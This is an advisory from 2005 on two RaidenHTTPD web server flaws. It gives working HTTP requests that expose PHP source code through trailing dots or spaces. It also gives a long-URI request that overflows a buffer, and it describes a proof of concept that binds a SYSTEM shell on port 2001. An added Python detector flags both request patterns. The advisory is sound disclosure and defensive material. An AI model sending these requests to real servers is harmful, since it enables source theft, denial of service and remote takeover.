by Tan Chew Keong
Release Date: 01 Mar 2005
RaidenHTTPD Server is a full-featured web server for Windows 98 / Me / 2000 / XP / 2003.
It is easy to install and use, and is designed for anyone who wants to have a website running within minutes.
A CGI source code disclosure vulnerability was found in RaidenHTTPD that may be exploited to obtain the
source code of any PHP script on the server. A buffer overflow vulnerability was also found that may be
remotely exploited to cause a DoS or to execute arbitrary code.
Tested on RaidenHTTPD Server Version 1.1.32 (Shareware) on English Win2K SP4.
This advisory documents two vulnerabilities found in the RaidenHTTPD server. The first may be remotely exploited
to obtain the source code of any PHP script on the server. The second is a buffer overflow vulnerability that may be
remotely exploited to cause a DoS or to execute arbitrary code on the server.
1. CGI source code disclosure vulnerability.
RaidenHTTPD supports CGI scripts written in PHP or Perl. The default installation comes with PHP installed. Using
a specially crafted URL, it is possible to obtain the source code of any PHP script on the server. The problem is that
under Windows, the filenames "test.php." (with a period at the end) and "test.php " (with one or more space
characters at the end) both open the file "test.php". The application fails to check for this condition: because
neither crafted filename ends with the extension of a CGI script (i.e. ".php"), it does not pass "test.php" to the PHP
interpreter but serves its raw contents as a plain file.
This vulnerability is shown in the two request/response exchanges below.

GET /test.php%20 HTTP/1.1
host: localhost
connection: close

HTTP/1.1 200 OK
Server: RaidenHTTPD/1.1.32 (Shareware)
Content-Type: application/octet_stream
Connection: close
Content-Length: 25

<?php
phpInfo();
?>

GET /test.php. HTTP/1.1
host: localhost
connection: close

HTTP/1.1 200 OK
Server: RaidenHTTPD/1.1.32 (Shareware)
Content-Type: application/octet_stream
Connection: close
Content-Length: 25

<?php
phpInfo();
?>
2. Buffer overflow when processing HTTP requests with a long URI.
A buffer overflow occurs when RaidenHTTPD receives a request whose URI is longer than 524 characters. The following
is an HTTP request that triggers the overflow. The characters 1234 (in the fourth line of the request below) overwrite
an entry in a string pointer table. This generates a read exception when the application tries to read data using
1234 as an address. This exception occurs 3 times before EIP gets overwritten with the characters wwww.
It was observed that the read exception and the overflow do not occur immediately; there is a short delay before
EIP gets overwritten. Exploitation is complicated by the fact that not all characters are allowed in the URI,
which limits the return addresses that can be used. In addition, none of the registers point to the shellcode when EIP
gets overwritten, further complicating the exploit.
POST /TESTAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZ1
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZ2
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZ3
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTT1234VVVVWWWWXXXXYYYYZZZ4
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYwwww HTTP/1.1
host: localhost
connection: close
The POC used to validate this vulnerability can be downloaded here. This POC has been tested on
Win2K SP4 and uses a hardcoded return address on the stack. Hence, it is not reliable and does not always work. Successful
exploitation binds a shell on port 2001 with LOCAL SYSTEM privilege. Note that after the exploit is sent, the server
stops responding to any HTTP requests. However, the shellcode does not get executed until about 2 minutes later, so you
need to try connecting to port 2001 every few seconds until you get a shell or the server gets automatically restarted.
Also note that the port remains open only for a few seconds. After that the overflowed process is terminated.
The following screen capture shows the EIP being overwritten.
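As an added, defender-side illustration of both issues (this is not code from the advisory or from RaidenHTTPD), the block below models the file-name normalisation the server should have applied before its extension check, and a detection rule that flags request lines matching either issue. The 524-character limit is the threshold stated above; the sample request lines are constructed.

```python
# Added example, not code from the advisory or from RaidenHTTPD: a defender-side
# model of the two issues described above. normalize_win_name() performs the
# classification the server should have done (Windows opens "test.php." and
# "test.php " as "test.php"); flag_request() is a detection rule for a proxy or
# log pipeline. The 524 byte limit is the threshold stated in the advisory; the
# sample request lines are constructed.
from urllib.parse import unquote

CGI_EXTENSIONS = (".php", ".pl")
MAX_SAFE_URI = 524  # longer URIs triggered the overflow in 1.1.32

def normalize_win_name(path: str) -> str:
    """Decode percent-escapes, drop any query string, then strip the trailing
    dots/spaces that Win32 silently discards from the last path component."""
    decoded = unquote(path.split("?", 1)[0])
    head, sep, name = decoded.rpartition("/")
    return head + sep + name.rstrip(". ")

def is_cgi_script(path: str) -> bool:
    """Vulnerable-style check: looks only at the raw request path."""
    return path.split("?", 1)[0].lower().endswith(CGI_EXTENSIONS)

def is_cgi_script_fixed(path: str) -> bool:
    """Hardened check: classify on the name the filesystem will actually open."""
    return normalize_win_name(path).lower().endswith(CGI_EXTENSIONS)

def flag_request(request_line: str) -> list[str]:
    """Return the reasons a request line matches either issue ([] if clean)."""
    parts = request_line.split(" ", 2)
    if len(parts) != 3:
        return ["malformed-request-line"]
    uri = parts[1]
    reasons = []
    if len(uri) > MAX_SAFE_URI:
        reasons.append("uri-too-long")
    # Raw name says "not a script" but the filesystem would open a script.
    if not is_cgi_script(uri) and is_cgi_script_fixed(uri):
        reasons.append("trailing-dot-or-space-on-script")
    return reasons

# Constructed sample request lines (not from a real server log).
SAMPLE_REQUESTS = [
    "GET /index.php HTTP/1.1",
    "GET /test.php%20 HTTP/1.1",
    "GET /test.php. HTTP/1.1",
    "POST /" + "A" * 600 + " HTTP/1.1",
]

for line in SAMPLE_REQUESTS:
    print(line[:40], flag_request(line))
```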
- Vendor has released version 1.1.34 that fixes these vulnerabilities.
20 Feb 05 - Vulnerability Discovered.
22 Feb 05 - Initial Vendor Notification.
22 Feb 05 - Initial Vendor Reply.
22 Feb 05 - Received notification from vendor that fixed version 1.1.34 is released.
01 Mar 05 - Public Release.
For further questions and enquiries, email the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg